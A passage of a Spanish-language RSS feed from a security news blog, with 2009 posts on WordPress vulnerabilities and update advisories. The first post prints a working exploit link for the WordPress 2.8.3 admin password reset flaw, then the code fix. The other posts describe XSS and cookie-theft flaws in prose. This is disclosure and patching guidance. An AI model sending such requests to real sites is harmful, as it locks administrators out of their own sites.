		<link>http://www.dragonjar.org/reseteo-remoto-del-password-de-admin-en-wordpress.xhtml</link>
		<comments>http://www.dragonjar.org/reseteo-remoto-del-password-de-admin-en-wordpress.xhtml#comments</comments>
		<pubDate>Wed, 12 Aug 2009 04:36:49 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Noticias Seguridad]]></category>
		<category><![CDATA[Administrador]]></category>
		<category><![CDATA[Password]]></category>
		<category><![CDATA[Vulnerabilidad]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=2948</guid>
		<description><![CDATA[No se que pasa con WordPress últimamente, el investigador Francés “Laurent Gaffié” acaba de publicar  un full-disclosure en el que explica una nueva vulnerabilidad en la ultima versión de WordPress 2.8.3.

Esta nueva vulnerabilidad permite a un visitante mal intencionado resetar el password de administrador de un administrador impidiendo el acceso del mismo a su [...]]]></description>
			<content:encoded><![CDATA[<p>No se que pasa con WordPress últimamente, el investigador Francés “<a rel="nofollow" target="_blank" href="http://lists.grok.org.uk/pipermail/full-disclosure/2009-August/070139.html" target="_blank">Laurent Gaffié</a>” acaba de publicar  un <a rel="nofollow" target="_blank" href="http://lists.grok.org.uk/pipermail/full-disclosure/2009-August/070139.html">full-disclosure</a> en el que explica una nueva vulnerabilidad en la ultima versión de WordPress 2.8.3.</p>
<p style="text-align: center;"><img title="XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2" src="http://img241.imageshack.us/img241/6261/wordpressbug.jpg" alt="WordPress 2.8.2 en Español" /></p>
<p>Esta nueva vulnerabilidad permite a un visitante mal intencionado resetar el password de administrador de un administrador impidiendo el acceso del mismo a su propio panel de administración, el error se encuentra en el archivo wp-login.php que no valida adecuadamente.<span id="more-2948"></span><br />
Un visitante mal intencionado puede resetear el password de administrador con solo visitar un enlace como el siguiente:</p>
<pre><a rel="nofollow" target="_blank" href="http://PAGINAAQUI.COM/wp-login.php?action=rp&amp;key=o7naCKN3OoeU2KJMMsag">http://PAGINAAQUI.COM/wp-login.php?action=rp&amp;key=o7naCKN3OoeU2KJMMsag</a></pre>
<p>La buena noticia es que igual de fácil a su explotación es su solución, basta con buscar en el archivo wp-login.php el código:</p>
<p><code>if ( empty( $key ) )</code></p>
<p>y remplazarlo por:</p>
<p><code>if ( empty( $key ) || is_array( $key ) )</code></p>
<p>Aunque como siempre es recomendable que actualices tu versión a la <a rel="nofollow" target="_blank" href="http://wordpress.org/download/" target="_blank">WordPress a la 2.8.4</a> aun no sale oficialmente en <a rel="nofollow" target="_blank" title="español" href="../tag/espanol">español</a>, pero puedes utilizar este <a rel="nofollow" target="_blank" href="http://es-wordpress.googlecode.com/files/wp-2.8.3-es_ES.zip">paquete de idiomas para traducirlo</a>.</p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml" title="WordPress 2.6.3 vulnerable a Cross Site Scripting">WordPress 2.6.3 vulnerable a Cross Site Scripting</a></li><li><a href="http://www.dragonjar.org/xss-que-permite-postear-en-wordpress.xhtml" title="XSS que permite postear a atacante registrado en WordPress">XSS que permite postear a atacante registrado en WordPress</a></li><li><a href="http://www.dragonjar.org/xss-en-wordpress-2-8-1-actualiza-a-wordpress-2-8-2.xhtml" title="XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2">XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2</a></li><li><a href="http://www.dragonjar.org/nuevo-gusano-infecta-routers-modems-y-sistemas-gnu-linux.xhtml" title="Nuevo Gusano Infecta Routers, Modems, y Sistemas GNU Linux">Nuevo Gusano Infecta Routers, Modems, y Sistemas GNU Linux</a></li><li><a href="http://www.dragonjar.org/actualiza-a-wordpress-265.xhtml" title="Actualiza a WordPress 2.6.5">Actualiza a WordPress 2.6.5</a></li><li><a href="http://www.dragonjar.org/actualiza-a-wordpress-263.xhtml" title="Actualiza a WordPress 2.6.3">Actualiza a WordPress 2.6.3</a></li><li><a href="http://www.dragonjar.org/2-problemas-graves-que-se-solucionan-en-wordpress-262.xhtml" title="2 Problemas graves que se solucionan en WordPress 2.6.2">2 Problemas graves que se solucionan en WordPress 2.6.2</a></li><li><a href="http://www.dragonjar.org/bug-en-wordpress-251.xhtml" title="Bug en WordPress 2.5.1">Bug en WordPress 2.5.1</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/reseteo-remoto-del-password-de-admin-en-wordpress.xhtml/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3</title>
		<link>http://www.dragonjar.org/problemas-de-seguridad-en-wordpress-2-8-2-actualiza-a-wordpress-2-8-3.xhtml</link>
		<comments>http://www.dragonjar.org/problemas-de-seguridad-en-wordpress-2-8-2-actualiza-a-wordpress-2-8-3.xhtml#comments</comments>
		<pubDate>Fri, 31 Jul 2009 18:54:26 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Noticias Seguridad]]></category>
		<category><![CDATA[Noticias Software]]></category>
		<category><![CDATA[Bug]]></category>
		<category><![CDATA[Español]]></category>
		<category><![CDATA[Instalación]]></category>
		<category><![CDATA[Nuevo]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=2889</guid>
		<description><![CDATA[De nuevo Automattic, la empresa desarrolladora de WordPress ha publicado una revisión de la rama 2.8.x de su producto estrella,  para corregir problemas de seguridad en la versión 2.8.2 de WordPress,  de momento no se tiene mucha informacion del problema, pero es recomendable que actualices tu instalación..

Recuerda que la nueva versión de WordPress, la 2.8.3 [...]]]></description>
			<content:encoded><![CDATA[<p>De nuevo Automattic, la empresa desarrolladora de <a rel="nofollow" target="_blank" title="WordPress" href="../tag/wordpress">WordPress</a> ha publicado una revisión de la rama 2.8.x de su producto estrella,  para corregir problemas de seguridad en la versión 2.8.2 de WordPress,  de momento no se tiene mucha informacion del problema, pero es recomendable que actualices tu instalación..</p>
<p style="text-align: center;"><img title="XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2" src="http://img241.imageshack.us/img241/6261/wordpressbug.jpg" alt="WordPress 2.8.2 en Español" /></p>
<p><span id="more-2889"></span>Recuerda que la nueva versión de <a rel="nofollow" target="_blank" href="http://wordpress.org/download/" target="_blank">WordPress, la 2.8.3</a> aun no sale oficialmente en <a rel="nofollow" target="_blank" title="español" href="../tag/espanol">español</a>, pero puedes utilizar este <a rel="nofollow" target="_blank" href="http://es-wordpress.googlecode.com/files/wp-2.8.2-es_ES.zip">paquete de idiomas para traducirlo</a>.</p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/dos-en-wordpress.xhtml" title="Denegacion de Servicio en WordPress">Denegacion de Servicio en WordPress</a></li><li><a href="http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml" title="WordPress 2.6.3 vulnerable a Cross Site Scripting">WordPress 2.6.3 vulnerable a Cross Site Scripting</a></li><li><a href="http://www.dragonjar.org/pueden-leer-tu-basura.xhtml" title="Pueden leer tu &#8220;Basura&#8221;">Pueden leer tu &#8220;Basura&#8221;</a></li><li><a href="http://www.dragonjar.org/realizaron-hardening-wordpress-descarga-la-nueva-versin-285.xhtml" title="Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5">Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5</a></li><li><a href="http://www.dragonjar.org/xss-en-wordpress-2-8-1-actualiza-a-wordpress-2-8-2.xhtml" title="XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2">XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2</a></li><li><a href="http://www.dragonjar.org/instalando-varios-sistemas-operativos-en-un-acer-one-parte-i.xhtml" title="Instalando Varios Sistemas Operativos en un Acer One &#8211; Parte I">Instalando Varios Sistemas Operativos en un Acer One &#8211; Parte I</a></li><li><a href="http://www.dragonjar.org/video-tutorial-honeypot.xhtml" title="Vídeo Tutorial Honeypot">Vídeo Tutorial Honeypot</a></li><li><a href="http://www.dragonjar.org/actualiza-a-wordpress-271.xhtml" title="Actualiza a WordPress 2.7.1">Actualiza a WordPress 2.7.1</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/problemas-de-seguridad-en-wordpress-2-8-2-actualiza-a-wordpress-2-8-3.xhtml/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2</title>
		<link>http://www.dragonjar.org/xss-en-wordpress-2-8-1-actualiza-a-wordpress-2-8-2.xhtml</link>
		<comments>http://www.dragonjar.org/xss-en-wordpress-2-8-1-actualiza-a-wordpress-2-8-2.xhtml#comments</comments>
		<pubDate>Mon, 20 Jul 2009 20:49:40 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Noticias Seguridad]]></category>
		<category><![CDATA[2009]]></category>
		<category><![CDATA[Bug]]></category>
		<category><![CDATA[Vulnerabilidad]]></category>
		<category><![CDATA[WordPress]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=2793</guid>
		<description><![CDATA[Parece que Automattic, la empresa desarrolladora de WordPress ha tenido mucho trabajo últimamente con la rama 2.8.x de su producto, primero corrigieron un error en la versión 2.8 de WordPress, sacando la 2.8.1 y en menos de 15 dias ha salido esta nueva versión 2.8.2 que soluciona una vulnerabilidad XSS en los comentarios, haciendo posible [...]]]></description>
			<content:encoded><![CDATA[<p>Parece que Automattic, la empresa desarrolladora de WordPress ha tenido mucho trabajo últimamente con la rama 2.8.x de su producto, primero corrigieron un error en la versión 2.8 de WordPress, sacando la 2.8.1 y en menos de 15 dias ha salido esta nueva versión 2.8.2 que soluciona <a rel="nofollow" target="_blank" href="http://wordpress.org/development/2009/07/wordpress-2-8-2/" target="_blank">una vulnerabilidad XSS</a> en los comentarios, haciendo posible que desde el panel de administración, un comentario especialmente diseñado, redirija al administrador a una url donde por ejemplo puedan robar sus cookies y acceder como administrador a nuestro panel.</p>
<p style="text-align: center;"><img src="http://img241.imageshack.us/img241/6261/wordpressbug.jpg" alt="WordPress 2.8.2 en Español" title="XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2" /></p>
<p><span id="more-2793"></span></p>
<p>Es recomendable que actualices tu versión de <a rel="nofollow" target="_blank" href="http://wordpress.org/download/" target="_blank">WordPress a la 2.8.2</a> aun no sale oficialmente en español, pero puedes utilizar este <a rel="nofollow" target="_blank" href="http://es-wordpress.googlecode.com/files/wp-2.8.2-es_ES.zip">paquete de idiomas para traducirlo</a>.</p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml" title="WordPress 2.6.3 vulnerable a Cross Site Scripting">WordPress 2.6.3 vulnerable a Cross Site Scripting</a></li><li><a href="http://www.dragonjar.org/xss-que-permite-postear-en-wordpress.xhtml" title="XSS que permite postear a atacante registrado en WordPress">XSS que permite postear a atacante registrado en WordPress</a></li><li><a href="http://www.dragonjar.org/los-blogs-alojados-en-wordpresscom-vulnerables.xhtml" title="Los Blogs alojados en WordPress.com Vulnerables ">Los Blogs alojados en WordPress.com Vulnerables </a></li><li><a href="http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml" title="Vulnerabilidad 0-day en todas las versiones de Windows">Vulnerabilidad 0-day en todas las versiones de Windows</a></li><li><a href="http://www.dragonjar.org/vulnerabilidad-xss-8-millones-aplicaciones-flash.xhtml" title="Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash">Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash</a></li><li><a href="http://www.dragonjar.org/multiples-vulnerabilidades-smf.xhtml" title="Multiples Vulnerabilidades en SMF">Multiples Vulnerabilidades en SMF</a></li><li><a href="http://www.dragonjar.org/dos-en-wordpress.xhtml" title="Denegacion de Servicio en WordPress">Denegacion de Servicio en WordPress</a></li><li><a href="http://www.dragonjar.org/bug-quick-question-joomla.xhtml" title="Bug en el modulo Quick Question de Joomla">Bug en el modulo Quick Question de Joomla</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/xss-en-wordpress-2-8-1-actualiza-a-wordpress-2-8-2.xhtml/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Actualiza a WordPress 2.7.1</title>
		<link>http://www.dragonjar.org/actualiza-a-wordpress-271.xhtml</link>
		<comments>http://www.dragonjar.org/actualiza-a-wordpress-271.xhtml#comments</comments>
		<pubDate>Tue, 10 Feb 2009 04:31:57 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Seguridad Web]]></category>
		<category><![CDATA[Actualizar]]></category>
		<category><![CDATA[Download]]></category>
		<category><![CDATA[Instalación]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=1987</guid>
		<description><![CDATA[Hace unas horas se publico la nueva versión 2.7.1 de WordPress, con la cual se da solución a 68 tickets que estaban pendientes,  es recomendable actualizar nuestra instalación de WordPress a esta nueva versión, ya sea descargándola y reemplazando los archivos o directamente desde ‘Herramientas&#62;Actualizar’ del panel de administración.
También puede interesarte...Nueva versíon de WordPress 2.9Realizaron [...]]]></description>
			<content:encoded><![CDATA[<p>Hace unas horas se publico la nueva versión 2.7.1 de WordPress, con la cual se da solución a <a rel="nofollow" target="_blank" href="http://trac.wordpress.org/query?status=closed&amp;milestone=2.7.1&amp;resolution=fixed&amp;order=priority">68 tickets que estaban pendientes</a>,  es recomendable actualizar nuestra instalación de <a rel="nofollow" target="_blank" href="http://wordpress.org/download/">WordPress</a> a esta nueva versión, ya sea descargándola y reemplazando los archivos o directamente desde ‘Herramientas&gt;Actualizar’ del panel de administración.</p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/nueva-version-de-wordpress-2-9.xhtml" title="Nueva versíon de WordPress 2.9">Nueva versíon de WordPress 2.9</a></li><li><a href="http://www.dragonjar.org/realizaron-hardening-wordpress-descarga-la-nueva-versin-285.xhtml" title="Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5">Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5</a></li><li><a href="http://www.dragonjar.org/problemas-de-seguridad-en-wordpress-2-8-2-actualiza-a-wordpress-2-8-3.xhtml" title="Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3">Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3</a></li><li><a href="http://www.dragonjar.org/instalar-leopard-en-intel-o-amd.xhtml" title="Instalar Mac OS X Leopard en un PC con Procesador Intel o AMD">Instalar Mac OS X Leopard en un PC con Procesador Intel o AMD</a></li><li><a href="http://www.dragonjar.org/actualiza-a-wordpress-265.xhtml" title="Actualiza a WordPress 2.6.5">Actualiza a WordPress 2.6.5</a></li><li><a href="http://www.dragonjar.org/pueden-leer-tu-basura.xhtml" title="Pueden leer tu &#8220;Basura&#8221;">Pueden leer tu &#8220;Basura&#8221;</a></li><li><a href="http://www.dragonjar.org/video-explotando-wm-downloader.xhtml" title="Video: Explotando WM Downloader ">Video: Explotando WM Downloader </a></li><li><a href="http://www.dragonjar.org/descargar-instalar-google-chrome-os.xhtml" title="Descargar e Instalar Google Chrome OS">Descargar e Instalar Google Chrome OS</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/actualiza-a-wordpress-271.xhtml/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WordPress 2.6.3 vulnerable a Cross Site Scripting</title>
		<link>http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml</link>
		<comments>http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml#comments</comments>
		<pubDate>Thu, 08 Jan 2009 10:48:02 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Noticias Seguridad]]></category>
		<category><![CDATA[Administrador]]></category>
		<category><![CDATA[Bug]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Vulnerabilidad]]></category>
		<category><![CDATA[WordPress]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=1793</guid>
		<description><![CDATA[
Gracias a blogsecurity y a ayudawordpress me entero de una vulnerabilidad descubierta por Jeremias Reith en WordPress 2.6.3  que podría permitir a un atacante sin identificar acceder a tu blog.
El fallo se encuentra en la funcion &#8220;self_link() &#8220;del  archivo &#8220;wp-includes/feed.php&#8221; que al no validar correctamente los parametros de entrada permite realizar un ataque XSS con [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img class="aligncenter" src="http://img123.imageshack.us/img123/19/xssvb6.jpg" alt="Vulnerabilidad en WordPress" title="WordPress 2.6.3 vulnerable a Cross Site Scripting" /></p>
<p>Gracias a <a rel="nofollow" target="_blank" href="http://blogsecurity.net/wordpress/wordpress/">blogsecurity</a> y a <a rel="nofollow" target="_blank" href="http://ayudawordpress.com/problema-de-seguridad-en-wordpress-263/">ayudawordpress</a> me entero de una vulnerabilidad descubierta por Jeremias Reith en WordPress 2.6.3  que podría permitir a un atacante sin identificar acceder a tu blog.</p>
<p>El fallo se encuentra en la funcion &#8220;self_link() &#8220;del  archivo &#8220;wp-includes/feed.php&#8221; que al no validar correctamente los parametros de entrada permite realizar un ataque XSS con el que se pueden acceder a las cookies del usuario y obtener privilegios de administrador.<span id="more-1793"></span></p>
<p>Este problema <a rel="nofollow" target="_blank" href="http://es.wordpress.org/wordpress-2.6.5-es_ES.zip" target="_blank">se solucionó en la versión WordPress 2.6.5</a>, si no quieres dar todavia el paso a la version 2.7 de wordpress es recomendable que actualices tu version a la 2.6.5 para resolver este problema de seguridad.</p>
<p>Jeremias ha publicado un aviso en <a rel="nofollow" target="_blank" href="http://seclists.org/bugtraq/2008/Nov/0209.html" target="_blank">Bugtraq</a>, en el que se explica en detalla tecnicamente el error e incluye un una <a rel="nofollow" target="_blank" href="http://blogsecurity.net/wordpress/wordpress/" target="_blank">prueba de concepto</a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/xss-en-wordpress-2-8-1-actualiza-a-wordpress-2-8-2.xhtml" title="XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2">XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2</a></li><li><a href="http://www.dragonjar.org/xss-que-permite-postear-en-wordpress.xhtml" title="XSS que permite postear a atacante registrado en WordPress">XSS que permite postear a atacante registrado en WordPress</a></li><li><a href="http://www.dragonjar.org/dos-en-wordpress.xhtml" title="Denegacion de Servicio en WordPress">Denegacion de Servicio en WordPress</a></li><li><a href="http://www.dragonjar.org/reseteo-remoto-del-password-de-admin-en-wordpress.xhtml" title="Reseteo Remoto del Password de Admin en WordPress">Reseteo Remoto del Password de Admin en WordPress</a></li><li><a href="http://www.dragonjar.org/problemas-de-seguridad-en-wordpress-2-8-2-actualiza-a-wordpress-2-8-3.xhtml" title="Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3">Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3</a></li><li><a href="http://www.dragonjar.org/los-blogs-alojados-en-wordpresscom-vulnerables.xhtml" title="Los Blogs alojados en WordPress.com Vulnerables ">Los Blogs alojados en WordPress.com Vulnerables </a></li><li><a href="http://www.dragonjar.org/como-tomar-control-dominio-windows.xhtml" title="¿Cómo tomar control de un Dominio en Windows?">¿Cómo tomar control de un Dominio en Windows?</a></li><li><a href="http://www.dragonjar.org/pueden-leer-tu-basura.xhtml" title="Pueden leer tu &#8220;Basura&#8221;">Pueden leer tu &#8220;Basura&#8221;</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
